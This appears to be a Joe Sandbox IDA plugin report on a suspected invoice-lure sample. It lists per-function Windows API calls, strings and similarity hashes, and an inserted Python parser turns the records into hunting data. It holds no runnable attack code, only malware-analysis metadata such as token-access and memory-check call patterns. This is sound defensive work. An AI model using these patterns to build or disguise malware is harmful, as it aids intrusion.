                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: 7cc704681855d239bdf9c07423eb7a473fd5dd754e845caf9c4a001e538eccb1
                                                              • Instruction ID: edde76e0859c8d2b6e9849bc4d1242fbcd40728813fdce4ff749366cfc811903
                                                              • Opcode Fuzzy Hash: 7cc704681855d239bdf9c07423eb7a473fd5dd754e845caf9c4a001e538eccb1
                                                              • Instruction Fuzzy Hash: 5201D631929616A7DB12AFA4A40D7DDBBF0BFA5710F244045F81467680CB3459F0CFD2
                                                              APIs
                                                                • Part of subcall function 0020AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                                • Part of subcall function 0020AF83: BeginPath.GDI32(?), ref: 0020B009
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0025EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 0025EA9B
                                                              • EndPath.GDI32(00000000), ref: 0025EAAB
                                                              • StrokePath.GDI32(00000000), ref: 0025EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: 84190e45d2f2b39d89cece78272412be75552f45ac8a785ceaa4059f0968923c
                                                              • Instruction ID: fd55c53340dbc71ff0f82e94658ab635271d617e43d8f67a5a6b40f5064b2a3f
                                                              • Opcode Fuzzy Hash: 84190e45d2f2b39d89cece78272412be75552f45ac8a785ceaa4059f0968923c
                                                              • Instruction Fuzzy Hash: 3AF08232005259BBDB12AFA4BC0DFCE3F29AF06311F544201FE15650E1877596A5CB99
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0022C84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0022C85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 0022C864
                                                              • AttachThreadInput.USER32(00000000), ref: 0022C86B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 591d70540f4720bf1ce8adc8acd00a72ff55e3d6a121ccab57f49ec1a866b694
                                                              • Instruction ID: 96ad2b5d38d4aa1353da884b85b0c1d3e11daabaf3dad2e827c762b2265fb8e5
                                                              • Opcode Fuzzy Hash: 591d70540f4720bf1ce8adc8acd00a72ff55e3d6a121ccab57f49ec1a866b694
                                                              • Instruction Fuzzy Hash: ABE03971141228BADB211FA2BC0DEDB7F2CEF067A1F408021B60D84460C6B18590CBE0
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0022B0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0022AC9D), ref: 0022B0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0022AC9D), ref: 0022B0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0022AC9D), ref: 0022B0F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: bf7efeecca557c6d002a6c12fd3e3844ccd1ccb0e888ad30b51e86deeebfa5d1
                                                              • Instruction ID: eb2abd3c3a7b902f7750051d655ff5c1cf5cc32453c8982fa15080e21d1a364d
                                                              • Opcode Fuzzy Hash: bf7efeecca557c6d002a6c12fd3e3844ccd1ccb0e888ad30b51e86deeebfa5d1
                                                              • Instruction Fuzzy Hash: 26E08632601222ABD7211FB17C0CB473BB8EF55791F018818F249D6040DF349481CB60
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0020B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0020B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0020B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0020B4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 0026DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0026DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0026DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0026DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0026DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026DE95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: ba26dd99303019ba1f8eee64bc1e3e4ef9a248242bd4599e13a9b00ef2afd5ba
                                                              • Instruction ID: 6e75529d9ca3d915729e80ef551e484889db65b2a79124cd09fccb36ded75b35
                                                              • Opcode Fuzzy Hash: ba26dd99303019ba1f8eee64bc1e3e4ef9a248242bd4599e13a9b00ef2afd5ba
                                                              • Instruction Fuzzy Hash: C2E06D31610245ABDB212F74BC0DBD93B21AF51335F44C266FA7D580E2C37249D0CB11
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: c4bbd1207701af70b986976923120218d6e9b3ae46fea7de815ab8f3be2e5c05
                                                              • Instruction ID: b6638788352baec1982a7549210731289f7d2444683ef257821739011e6a5b70
                                                              • Opcode Fuzzy Hash: c4bbd1207701af70b986976923120218d6e9b3ae46fea7de815ab8f3be2e5c05
                                                              • Instruction Fuzzy Hash: 55E01AB1510204EFDB015F70A84CA2E7BB8EF4C351F118806FC5E87251CBB598808B40
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0022B2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 0022B2EB
                                                              • CloseHandle.KERNEL32(?), ref: 0022B2F4
                                                              • CloseHandle.KERNEL32(?), ref: 0022B2FC
                                                                • Part of subcall function 0022AB24: GetProcessHeap.KERNEL32(00000000,?,0022A848), ref: 0022AB2B
                                                                • Part of subcall function 0022AB24: HeapFree.KERNEL32(00000000), ref: 0022AB32
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: dca5cfd1c6500f5e8fbf5f53406cb7d91932c431a802446fd96b3c89e0ebc8b8
                                                              • Instruction ID: eee8f1f75c444e034e6d7c853c8ccb1a845d56c0076be30c99124e14cba43ded
                                                              • Opcode Fuzzy Hash: dca5cfd1c6500f5e8fbf5f53406cb7d91932c431a802446fd96b3c89e0ebc8b8
                                                              • Instruction Fuzzy Hash: D9E0263A104405BBDB016BA5FC0C859FBB6FF993213508621F62981575CB72A8B1EF91
APIs
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 12009f0f5ff4fce972cd0d524959ce3a8c96303a8f7c08632b57d5a149cc830b
• Instruction ID: c38d18f1c4c6de3e98bdb65f7d8b7cabcd893d402be7354306e7abb278a58083
• Opcode Fuzzy Hash: 12009f0f5ff4fce972cd0d524959ce3a8c96303a8f7c08632b57d5a149cc830b
• Instruction Fuzzy Hash: 46E0B6B1510304EFDB015F70E84CA6DBBB9EF4C351F12881AF95E9B251DBB9A9818F50
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0022DEAA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 92db10bdd7cca7327ad2ad9591afec3b410cbb385823826166e7c6e8251792bd
• Instruction ID: 57a118486b76f754da1b204196465c4cd0ed521e505f7340551019d1a5647e50
• Opcode Fuzzy Hash: 92db10bdd7cca7327ad2ad9591afec3b410cbb385823826166e7c6e8251792bd
• Instruction Fuzzy Hash: 9C914870620712EFDB24CFA4D984B6AB7B5BF49710F10846DF94ACB691DBB0E851CB50
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: _wcscpy
• String ID: I/&$I/&
• API String ID: 3048848545-1687073061
• Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
• Instruction ID: 5fc78f07099be8b58bee61f2eeb7d86894371d842e031a89746829398eabd874
• Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
• Instruction Fuzzy Hash: 70414CB1920217EBCF24DF88C451AFCB774EF18310F60405BE981A7191DB705EA6C7A0
APIs
• Sleep.KERNEL32(00000000), ref: 0020BCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 0020BCF3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
• Instruction ID: 0a60fa56773d87ec3cf622a597ce3461f390d9deedc075025e1d964359894839
• Opcode Fuzzy Hash: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
• Instruction Fuzzy Hash: 21512371418748DBE320AF14E88ABAFBBECFB95754F41484EF1C8410A2DF7095AC8B52
APIs
  • Part of subcall function 001F44ED: __fread_nolock.LIBCMT ref: 001F450B
• _wcscmp.LIBCMT ref: 0023C65D
• _wcscmp.LIBCMT ref: 0023C670
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 61028b2709e9850f82a285b31ff2ee1b61a72a8ebc453a5fc0db207eb67d4e7a
• Instruction ID: 5b08fc7380f494aa69c1c079d33fad2f70ae458dc34f5fc8d965a9dd0f49e255
• Opcode Fuzzy Hash: 61028b2709e9850f82a285b31ff2ee1b61a72a8ebc453a5fc0db207eb67d4e7a
• Instruction Fuzzy Hash: 7641C472A1420ABBDF21AFA4DC42FEF77B9AF89714F100069F605BB181D7719A148B51
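The records above are uniform enough to parse mechanically, which is how a report like this becomes hunting data: which functions call a given API directly rather than through a subcall, and which Opcode IDs recur across samples. The Python below is an added example rather than Joe Sandbox code. It reads the layout exactly as rendered on this page; the section headings, the "• Key: Value" bullets, the "Part of subcall function" prefix and the optional argument list are assumptions taken from the page, not from a published format description, and the embedded SAMPLE is constructed from the Sleep/GlobalMemoryStatusEx and _wcscmp records immediately above.

```python
"""Parse Joe Sandbox IDA Plugin function records (the layout shown above) into
structured data. Added example, not Joe Sandbox code: the section headings, the
'• Key: Value' bullets and the 'Part of subcall function' prefix are assumed from
how the page renders them, not from a published format description."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Sleep.KERNEL32(00000000), ref: 0020BCDA"  or, for a call made inside a callee,
# "• Part of subcall function 001F44ED: __fread_nolock.LIBCMT ref: 001F450B"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*?)\s*$")  # key ends at first colon

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                    # call-site address as printed in the report
    caller: str | None = None   # set only for "Part of subcall function" entries

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, list[str]] = field(default_factory=dict)  # repeated keys keep every value

    def get(self, key: str) -> str:
        return self.fields.get(key, [""])[0]

    def direct_api_names(self) -> list[str]:
        return [c.name for c in self.apis if c.caller is None]

def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":              # every record opens with its APIs section
                records.append(FunctionRecord())
            section = line
        elif not records:
            continue                        # text before the first record
        elif section == "APIs":
            m = API_RE.match(line)
            if m is None:
                raise ValueError(f"unrecognised API line: {line!r}")
            args = [a for a in (m["args"] or "").split(",") if a]
            records[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings":
            records[-1].strings.append(line.lstrip("• "))
        else:
            m = KV_RE.match(line)
            if m is None:
                raise ValueError(f"unrecognised metadata line: {line!r}")
            records[-1].fields.setdefault(m["key"], []).append(m["value"])
    return records

def find_by_apis(records, *names: str, direct_only: bool = True) -> list[FunctionRecord]:
    """Records whose API list contains every name in `names`."""
    wanted = set(names)
    return [r for r in records
            if wanted <= {c.name for c in r.apis if c.caller is None or not direct_only}]

# Constructed sample: two records copied from the report above (indentation and the
# fused "Download File" link text removed; the second record is abbreviated).
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000), ref: 0020BCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 0020BCF3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• Opcode ID: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
• Opcode Fuzzy Hash: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
APIs
  • Part of subcall function 001F44ED: __fread_nolock.LIBCMT ref: 001F450B
• _wcscmp.LIBCMT ref: 0023C65D
• _wcscmp.LIBCMT ref: 0023C670
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• Opcode ID: 61028b2709e9850f82a285b31ff2ee1b61a72a8ebc453a5fc0db207eb67d4e7a
"""
```

`find_by_apis(parse_records(SAMPLE), "Sleep", "GlobalMemoryStatusEx")` returns only the first record, and `__fread_nolock` matches the second only with `direct_only=False`, because the report attributes that call to subcall 001F44ED rather than to the function itself. In every record on this page the Opcode ID and Opcode Fuzzy Hash fields carry the same value, so either serves as the pivot key when comparing reports.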
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0025A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0025A86F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: fea8969c9723fc0c102bc329fc4932740b0a9266a3392450091c62c4e56ee272
• Instruction ID: d2a82dc10a23d60257baafd5140f7c97e3218e37c022c404062cf7241214bddb
• Opcode Fuzzy Hash: fea8969c9723fc0c102bc329fc4932740b0a9266a3392450091c62c4e56ee272
• Instruction Fuzzy Hash: DF41E774A1120A9FDB14CF68D885BEABBB9FF08301F14016AED05AB381D770A956CF95
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0025980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0025984A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 4f59807764fe5740af5bc196707713778aeb4772a0d320d6ba8819159837dc34
• Instruction ID: ae0208ef36e2b8e7c92f59cb787940378cf19116005ae708215ff668d4dda877
• Opcode Fuzzy Hash: 4f59807764fe5740af5bc196707713778aeb4772a0d320d6ba8819159837dc34
• Instruction Fuzzy Hash: 47316D71120605AEEB109F74DC84BBB73A9FF59761F00861AF8A9C7190CA31ACA5DB64
APIs
• _memset.LIBCMT ref: 002351C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00235201
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 70a776343965fe3d06ce957097e61e9119f76f93d905bfe132bc2ca29ebd0e97
• Instruction ID: 2c380d95b2c423be5e776c365c59c96552f284a33dc0dfb47d11d9bf6d476b49
• Opcode Fuzzy Hash: 70a776343965fe3d06ce957097e61e9119f76f93d905bfe132bc2ca29ebd0e97
• Instruction Fuzzy Hash: B53134B1A203169BEB24CF89D845BAFBBF4FF41350F140419ED89A61A0E7B09A60CB10
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: 15408e63cdebacefafc6935bb8d8972ae4f7201101038f6b7728741aaa076c5f
• Instruction ID: 1d7a7ec7d3cd2268a13cc52f82ffca3228989670c3fd2a16f30c285e5f750e51
• Opcode Fuzzy Hash: 15408e63cdebacefafc6935bb8d8972ae4f7201101038f6b7728741aaa076c5f
• Instruction Fuzzy Hash: 38219131610118AFCF14EFA4C882EED77B9AF56740F010469F605AB181DB74EE65CBA6
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0025945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00259467
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
